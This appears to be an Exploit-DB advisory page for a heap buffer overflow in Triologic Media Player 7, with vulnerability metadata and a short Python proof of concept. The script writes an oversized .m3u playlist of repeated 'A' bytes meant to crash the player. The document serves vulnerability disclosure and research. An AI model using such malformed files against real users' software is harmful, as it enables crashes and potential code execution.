Triologic Media Player 7 (.m3u) Local Heap Buffer Overflow PoC

vendor:

Triologic Media Player

by:

zAx

9.3

CVSS

HIGH

Heap Buffer Overflow

122

CWE

Product Name: Triologic Media Player

Affected Version From: 7

Affected Version To: 7

Patch Exists: NO

Related CWE: N/A

CPE: a:triologic:triologic_media_player

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

Triologic Media Player 7 (.m3u) Local Heap Buffer Overflow PoC

Triologic Media Player 7 is prone to a local heap-based buffer-overflow vulnerability because it fails to perform boundary checks on user-supplied data. An attacker can exploit this issue to execute arbitrary code within the context of the application. Failed exploit attempts will result in a denial-of-service condition.

Mitigation:

No known mitigation or remediation is available for this vulnerability.

Source

Exploit-DB raw data:

# IN THE NAME OF ALLAH :)
#!/usr/bin/python
# Discovered By : zAx
# Download Application : http://www.download.com/Triologic-Media-Player/3000-2139_4-10601848.html?tag=mncol

print "**************************************************************************"
print " Triologic Media Player 7 (.m3u) Local Heap Buffer Overflow PoC\n"
print " Discovered By : zAx\n"
print " ThE-zAx@HoTMaiL.CoM\n"
print " In that PoC thanks for : Stack ;) My BrOthEr :)"
print "**************************************************************************"

overflow = "\x41" * 3000 # not right, just a PoC

try:
    out_file = open("zAx.m3u",'w')
    out_file.write(overflow)
    out_file.close()
    raw_input("\nPoC file created!, Now go to the program and click at Load Button\n")
except:
    print "Error"
# EoF

# milw0rm.com [2009-01-12]